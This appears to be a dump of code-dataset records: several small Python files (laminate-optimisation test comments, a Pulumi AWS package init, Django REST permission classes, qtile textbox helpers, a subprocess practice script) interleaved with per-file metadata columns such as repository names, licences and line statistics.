    # global_sensitivities = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
    # parameters = Parameters(
    #     constraints=constraints, n_outer_step=1, group_size_min=4,
    #     group_size_max=10, sensitivities=global_sensitivities,
    #     n_pdl_max=2, n_panels=2)
    # ss_target1 = np.zeros((10,))
    # n_plies_target1 = ss_target1.size
    # ss_target2 = np.zeros((8,))
    # n_plies_target2 = ss_target2.size
    # lampam_target1 = calc_lampam(ss_target1, constraints)
    # lampam_target2 = calc_lampam(ss_target2, constraints)
    # boundaries = np.array([[1, 0]])
    # panel_1 = Panel(
    #     lampam_target=lampam_target1, n_plies=n_plies_target1, area=1,
    #     constraints=constraints)
    # panel_2 = Panel(
    #     lampam_target=lampam_target2, n_plies=n_plies_target2, area=1,
    #     constraints)
    # multipanel = MultiPanel(panels=[panel_1, panel_2])
    # constraints.sym = False
    # divide_panels_2(multipanel, parameters, constraints, 0)
    # ss = [np.array([0, 0, 0, 0, 90, 90, 0, 0, 0, 0]),
    #       np.array([0, 0, -45, -45, 90, 0, 45, 0])]
    # inner_step = -1
    # print(f'ss: {ss}')
    # print(f'sym: {sym}\n')
    # print('Lamination parameter outputs:\n')
    # print(calc_delta_lampam_mp(
    #     ss, multipanel, constraints=constraints, inner_step=inner_step))
    # print('\n*** Test for the function calc_delta_lampam_mp_2 ***\n')
    # print('Inputs:\n')
    # constraints.sym = True
    # ss_target1 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
    # n_plies_target1 = ss_target1.size
    # ss_target2 = np.array([0, 0, 0, 0, 0, 0, 0, 0])
    # n_plies_target2 = ss_target2.size
    # lampam_target1 = calc_lampam(ss_target1, constraints)
    # lampam_target2 = calc_lampam(ss_target2, constraints)
    # boundaries = np.array([[1, 0]])
    # panel_1 = Panel(
    #     lampam_target=lampam_target1, n_plies=n_plies_target1, area=1,
    #     constraints=constraints)
    # panel_2 = Panel(
    #     lampam_target=lampam_target2, n_plies=n_plies_target2, area=1,
    #     constraints=constraints)
    # multipanel = MultiPanel(panels=[panel_1, panel_2])
    # divide_panels_2(multipanel, parameters, constraints, 0)
    # a = np.array([45, -45])
    # ss = [np.copy(a) for ind_panel in range(multipanel.n_panels)]
    # sym = True
    # print(f'ss: {ss}')
    # print(f'sym: {sym}\n')
    # print('Lamination parameter outputs:\n')
    # print(calc_delta_lampam_mp_2(ss, multipanel, constraints))
    #
    # print("""\n*** Test for the functions:
    #     calc_delta_lampam_mp_3
    #     calc_delta_lampam_mp_3A
    #     calc_delta_lampam_mp_3D ***\n""")
    # print('Inputs:\n')
    # ss = 0
    # n_first_ply = np.array([1, 5, 0])
    # n_plies = np.array([10, 10, 10])
    # sym = True
    # print(f'ss: {ss}')
    # print(f'n_plies: {n_plies}')
    # print(f'n_first_ply: {n_first_ply}')
    # print(f'sym: {sym}\n')
    # print('Lamination parameter outputs:\n')
    # print_lampam(calc_delta_lampam_mp_3(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print_lampam(calc_delta_lampam_mp_3(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
    # print_lampam(calc_delta_lampam_mp_3(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
    # ss = 0
    # n_first_ply = np.array([2, 2])
    # n_plies = np.array([10, 6])
    # sym = True
    # print_lampam(calc_delta_lampam_mp_3(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print_lampam(calc_delta_lampam_mp_3(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
    # ss = 0
    # n_first_ply = np.array([1, 5, 0])
    # n_plies = np.array([10, 10, 10])
    # sym = True
    # print(calc_delta_lampam_mp_3A(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print(calc_delta_lampam_mp_3A(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
    # print(calc_delta_lampam_mp_3A(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
    # ss = 0
    # n_first_ply = np.array([2, 2])
    # n_plies = np.array([10, 6])
    # sym = True
    # print(calc_delta_lampam_mp_3A(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print(calc_delta_lampam_mp_3A(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
    # ss = 0
    # n_first_ply = np.array([1, 5, 0])
    # n_plies = np.array([10, 10, 10])
    # sym = True
    # print(calc_delta_lampam_mp_3D(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print(calc_delta_lampam_mp_3D(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
    # print(calc_delta_lampam_mp_3D(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[2])
    # ss = 0
    # n_first_ply = np.array([2, 2])
    # n_plies = np.array([10, 6])
    # sym = True
    # print(calc_delta_lampam_mp_3D(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[0])
    # print(calc_delta_lampam_mp_3D(
    #     ss, n_first_ply, n_plies, constraints, middle_ply=0)[1])
| 38.485762
| 83
| 0.655053
| 6,753
| 45,952
| 4.209685
| 0.046202
| 0.049599
| 0.028141
| 0.049247
| 0.869882
| 0.83759
| 0.811278
| 0.791614
| 0.767588
| 0.734557
| 0
| 0.0241
| 0.248716
| 45,952
| 1,193
| 84
| 38.518022
| 0.799351
| 0.453865
| 0
| 0.681818
| 0
| 0
| 0.068212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037879
| false
| 0.007576
| 0.00947
| 0
| 0.106061
| 0.020833
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c45a29b83e992c2db9b153b6e98d5ad7fe3aa779
| 193
|
py
|
Python
|
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | null | null | null |
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | null | null | null |
tws_equities/helpers/__init__.py
|
ajmal017/TWS-Equities
|
12865df32726b1ae50875d800588a714c08de086
|
[
"MIT"
] | 5
|
2021-01-05T13:07:03.000Z
|
2021-02-16T18:03:05.000Z
|
# -*- coding: utf-8 -*-
from tws_equities.helpers.contract_maker import create_stock
from tws_equities.helpers.utils import *
HISTORICAL_DATA_STORAGE = join(PROJECT_ROOT, 'historical_data')
| 24.125
| 63
| 0.792746
| 26
| 193
| 5.576923
| 0.730769
| 0.096552
| 0.206897
| 0.303448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.103627
| 193
| 7
| 64
| 27.571429
| 0.83237
| 0.108808
| 0
| 0
| 0
| 0
| 0.088235
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c45c155ad9530aa8511d0138db88b6d13805def3
| 474
|
py
|
Python
|
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
utilities/tfwrapper/__init__.py
|
wong-ck/DeepSegment
|
01c04b2d80355b97d3494e0073ba35ef9c98e546
|
[
"MIT"
] | null | null | null |
# Written by Chun Kit Wong and CIRC under MIT license:
# https://github.com/wong-ck/DeepSegment/blob/master/LICENSE
from utilities.tfwrapper import model
from utilities.tfwrapper import layer
from utilities.tfwrapper import loss
from utilities.tfwrapper import optimizer
from utilities.tfwrapper import estimator
from utilities.tfwrapper import input_fn
from utilities.tfwrapper import hook
from utilities.tfwrapper import metric
from utilities.tfwrapper import summary
| 29.625
| 60
| 0.841772
| 65
| 474
| 6.123077
| 0.476923
| 0.29397
| 0.497487
| 0.633166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111814
| 474
| 15
| 61
| 31.6
| 0.945368
| 0.234177
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c465bb661162e09c744b3b1fd66a2b3460cbf343
| 264
|
py
|
Python
|
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
medimodule/base.py
|
namyouth/MI2RLNet
|
1b17723706207d5f841e72d9a0bebfd6ec831c07
|
[
"Apache-2.0"
] | null | null | null |
from abc import *
class BaseModule(metaclass=ABCMeta):
@abstractmethod
def init(self, weight_path):
pass
@abstractmethod
def _preprocessing(self, path):
pass
@abstractmethod
def predict(self, img):
pass
| 16.5
| 36
| 0.613636
| 26
| 264
| 6.153846
| 0.653846
| 0.31875
| 0.275
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.310606
| 264
| 15
| 37
| 17.6
| 0.879121
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.272727
| 0.090909
| 0
| 0.454545
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
09ffd708ba04880bfbb7dd5da2eef9fb4bd4d6b8
| 22
|
py
|
Python
|
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
libs/arthur/document/__init__.py
|
jaycode/Arthur.workspace
|
7a581104141ee5f556e058b1276b4087a2921dfc
|
[
"Apache-2.0"
] | null | null | null |
from document import *
| 22
| 22
| 0.818182
| 3
| 22
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 22
| 1
| 22
| 22
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6705d964c5ae71dbef28447d7b17cc4f8aaffe90
| 189
|
py
|
Python
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 29
|
2016-09-15T13:28:21.000Z
|
2022-01-06T14:48:48.000Z
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 3
|
2017-05-12T08:26:30.000Z
|
2021-09-21T16:33:34.000Z
|
py2swagger/plugins/drf/introspectors/__init__.py
|
eguven/py2swagger
|
729bc96557b217f48e78db4e78e561ee93eee17d
|
[
"MIT"
] | 8
|
2016-11-25T10:50:10.000Z
|
2020-10-30T20:24:34.000Z
|
# Version gate for Django REST Framework feature differences.
# NOTE(review): distutils is deprecated and removed from the stdlib in
# Python 3.12 — packaging.version would be the modern replacement; confirm
# supported Python versions before migrating.
from distutils.version import StrictVersion
from rest_framework import VERSION as REST_FRAMEWORK_VERSION
# True when the installed rest_framework is strictly newer than 3.0.0.
REST_FRAMEWORK_V3 = StrictVersion(REST_FRAMEWORK_VERSION) > StrictVersion('3.0.0')
| 37.8
| 82
| 0.857143
| 25
| 189
| 6.2
| 0.44
| 0.335484
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023121
| 0.084656
| 189
| 4
| 83
| 47.25
| 0.872832
| 0
| 0
| 0
| 0
| 0
| 0.026455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6756e833672d5fc65996f4205d09ac2ce70bfbc4
| 3,868
|
py
|
Python
|
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | null | null | null |
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | 11
|
2020-03-28T18:51:50.000Z
|
2022-01-13T01:47:40.000Z
|
irekua_rest_api/permissions/items.py
|
IslasGECI/irekua-rest-api
|
35cf5153ed7f54d12ebad2ac07d472585f04e3e7
|
[
"BSD-4-Clause"
] | 1
|
2021-05-06T19:38:14.000Z
|
2021-05-06T19:38:14.000Z
|
from rest_framework.permissions import BasePermission
from irekua_permissions.annotations import (
annotations as annotation_permissions)
class CanAnnotate(BasePermission):
    """Allow the request when the user may create annotations on the item."""

    def has_permission(self, request, view):
        target_item = view.get_object()
        return annotation_permissions.create(request.user, item=target_item)
class IsCreator(BasePermission):
    """Grant object-level access only to the user that created the object."""

    def has_object_permission(self, request, view, obj):
        return obj.created_by == request.user
class HasUpdatePermission(BasePermission):
    """Require 'change_collection_item' on the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.has_permission(
            request.user, 'change_collection_item')
class HasViewPermission(BasePermission):
    """Require 'view_collection_item' on the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.has_permission(
            request.user, 'view_collection_item')
class HasViewAnnotationsPermission(BasePermission):
    """Require 'view_collection_annotations' on the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.has_permission(
            request.user, 'view_collection_annotations')
class HasDownloadPermission(BasePermission):
    """Require 'download_collection_items' on the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.has_permission(
            request.user, 'download_collection_items')
class HasAddAnnotationPermission(BasePermission):
    """Require 'add_collection_annotation' on the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.has_permission(
            request.user, 'add_collection_annotation')
class IsCollectionAdmin(BasePermission):
    """Allow administrators of the item's owning collection."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.is_admin(request.user)
class IsCollectionTypeAdmin(BasePermission):
    """Allow administrators of the owning collection's collection type."""

    def has_object_permission(self, request, view, obj):
        owning_collection = obj.sampling_event_device.sampling_event.collection
        return owning_collection.collection_type.is_admin(request.user)
class ItemIsOpenToView(BasePermission):
    """Open viewing: an inactive licence imposes no restriction; otherwise
    the licence type decides whether viewing is allowed."""

    def has_object_permission(self, request, view, obj):
        licence = obj.licence
        if licence.is_active:
            return licence.licence_type.can_view
        return True
class ItemIsOpenToDownload(BasePermission):
    """Open download: an inactive licence imposes no restriction; otherwise
    the licence type decides whether downloading is allowed."""

    def has_object_permission(self, request, view, obj):
        licence = obj.licence
        if licence.is_active:
            return licence.licence_type.can_download
        return True
class ItemIsOpenToAnnotate(BasePermission):
    """Open annotation: an inactive licence imposes no restriction; otherwise
    the licence type decides whether annotating is allowed."""

    def has_object_permission(self, request, view, obj):
        licence = obj.licence
        if licence.is_active:
            return licence.licence_type.can_annotate
        return True
class ItemIsOpenToViewAnnotations(BasePermission):
    """Open annotation viewing: an inactive licence imposes no restriction;
    otherwise the licence type decides."""

    def has_object_permission(self, request, view, obj):
        licence = obj.licence
        if licence.is_active:
            return licence.licence_type.can_view_annotation
        return True
| 29.30303
| 77
| 0.726732
| 420
| 3,868
| 6.438095
| 0.135714
| 0.134615
| 0.119083
| 0.120192
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0.715976
| 0
| 0
| 0.208376
| 3,868
| 131
| 78
| 29.526718
| 0.883083
| 0
| 0
| 0.614458
| 0
| 0
| 0.030765
| 0.025595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156627
| false
| 0
| 0.024096
| 0
| 0.542169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
67632191d22aacd6ae3f95f94fc59722685070ad
| 138
|
py
|
Python
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 3
|
2017-06-23T15:19:31.000Z
|
2018-03-07T01:31:37.000Z
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 75
|
2017-06-15T20:09:32.000Z
|
2018-01-17T01:30:26.000Z
|
server/controller/__init__.py
|
cnavrides/wireless-debugging
|
9c057d0127a5f8eebca4193af4bdb7e96c3ae6dd
|
[
"Apache-2.0"
] | 3
|
2017-06-17T04:39:10.000Z
|
2017-08-16T15:25:00.000Z
|
"""
Controller Module
"""
import controller.authentication
import controller.root
import controller.sessions
import controller.websocket
| 15.333333
| 32
| 0.833333
| 14
| 138
| 8.214286
| 0.5
| 0.556522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094203
| 138
| 8
| 33
| 17.25
| 0.92
| 0.123188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
677f6d09ca6f5257b42f83e501f87c0909d4c0b1
| 178
|
py
|
Python
|
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
examples/view_queue.py
|
n8jhj/SoonQ
|
5a2f34c98aa8020cc9c6563d6e8e274f05feda2a
|
[
"MIT"
] | null | null | null |
"""View info about tasks in the queue.
"""
import soonq as sq
from soonq.commands import tabulate_task_items
def view_queue():
    """Echo a table of queued task entries (at most five)."""
    table = tabulate_task_items(max_entries=5)
    sq.echo(table)
| 17.8
| 47
| 0.758427
| 29
| 178
| 4.448276
| 0.724138
| 0.186047
| 0.263566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006579
| 0.146067
| 178
| 9
| 48
| 19.777778
| 0.842105
| 0.196629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
67e284e26bd7c47f0d14e250b5a229501e16b50a
| 209
|
py
|
Python
|
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | null | null | null |
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | null | null | null |
30-Days-of-Python-master/practice_day_9/practice.py
|
vimm0/python_exercise
|
7773d95b4c25b82a9d014f7a814ac83df9ebac17
|
[
"MIT"
] | 1
|
2018-01-04T16:27:31.000Z
|
2018-01-04T16:27:31.000Z
|
# Practice script: running shell commands and inspecting the working directory.
import subprocess
# Examples of invoking commands via subprocess (kept commented for reference):
# subprocess.call(["ls", "-l", "/etc/resolv.conf"])
# subprocess.call(["ls"])
import os
# Print the interpreter's current working directory.
print(os.getcwd())
# Sample output and further experiments, left commented out:
# '/home/user'
# os.chdir("/tmp/")
# subprocess.call(["ls"])
# os.getcwd()
# '/tmp'
| 19
| 51
| 0.61244
| 28
| 209
| 4.571429
| 0.535714
| 0.328125
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100478
| 209
| 11
| 52
| 19
| 0.680851
| 0.703349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
db0c32a35dd2f9e5e411d879edeac9eae20dc9a5
| 740
|
py
|
Python
|
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws_native/rds/__init__.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .db_cluster import *
from .db_cluster_parameter_group import *
from .db_instance import *
from .db_parameter_group import *
from .db_proxy import *
from .db_proxy_endpoint import *
from .db_proxy_target_group import *
from .db_security_group import *
from .db_security_group_ingress import *
from .db_subnet_group import *
from .event_subscription import *
from .global_cluster import *
from .option_group import *
from ._inputs import *
from . import outputs
| 30.833333
| 80
| 0.774324
| 111
| 740
| 4.927928
| 0.477477
| 0.274223
| 0.219378
| 0.124314
| 0.195612
| 0.100548
| 0
| 0
| 0
| 0
| 0
| 0.001587
| 0.148649
| 740
| 23
| 81
| 32.173913
| 0.866667
| 0.274324
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c01b1de26d27d74fa33c8e3aca130b6332927af9
| 1,073
|
py
|
Python
|
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
qtile/unicodes.py
|
MysteryMage/dotfiles
|
f8604b93f25502ec7a3c6d29111130f6fb7dd0d5
|
[
"MIT"
] | null | null | null |
from libqtile.widget.textbox import TextBox
def left_half_circle(fg_color):
    """Build a TextBox holding the left half-circle glyph in *fg_color*."""
    glyph = TextBox(
        text='\uE0B6',
        foreground=fg_color,
        padding=0,
        fontsize=28)
    return glyph
def right_half_circle(fg_color):
    """Build a TextBox holding the right half-circle glyph in *fg_color*."""
    glyph = TextBox(
        text='\uE0B4',
        foreground=fg_color,
        padding=0,
        fontsize=28)
    return glyph
def lower_left_triangle(bg_color, fg_color):
    """Build a TextBox holding the lower-left triangle glyph."""
    glyph = TextBox(
        text='\u25e2',
        foreground=fg_color,
        background=bg_color,
        padding=0,
        fontsize=50)
    return glyph
def lower_right_triangle(bg_color, fg_color):
    """Build a TextBox holding the lower-right triangle glyph."""
    glyph = TextBox(
        text='\u25e3',
        foreground=fg_color,
        background=bg_color,
        padding=0,
        fontsize=50)
    return glyph
def left_arrow(bg_color, fg_color):
    """Build a TextBox holding the left-pointing arrow glyph."""
    glyph = TextBox(
        text='\uE0B2',
        foreground=fg_color,
        background=bg_color,
        padding=0,
        fontsize=22)
    return glyph
def right_arrow(bg_color, fg_color):
    """Build a TextBox holding the right-pointing arrow glyph."""
    glyph = TextBox(
        text='\uE0B0',
        foreground=fg_color,
        background=bg_color,
        padding=0,
        fontsize=22)
    return glyph
| 19.87037
| 45
| 0.604846
| 126
| 1,073
| 4.912698
| 0.253968
| 0.135703
| 0.12601
| 0.193861
| 0.825525
| 0.825525
| 0.825525
| 0.710824
| 0.345719
| 0.345719
| 0
| 0.042497
| 0.298229
| 1,073
| 53
| 46
| 20.245283
| 0.779548
| 0
| 0
| 0.682927
| 0
| 0
| 0.033551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.146341
| false
| 0
| 0.02439
| 0.146341
| 0.317073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
c041495ed9d4e7d3b7af4fbb67843d9234178471
| 30
|
py
|
Python
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 404
|
2019-05-07T02:21:57.000Z
|
2022-03-31T17:03:04.000Z
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/TestDiscoverer/ConfigPythonFiles/example_pt.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
def test_3():
    """Placeholder test that always passes (exists for test discovery)."""
    assert 1 == 1
| 10
| 15
| 0.633333
| 5
| 30
| 3.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.266667
| 30
| 2
| 16
| 15
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
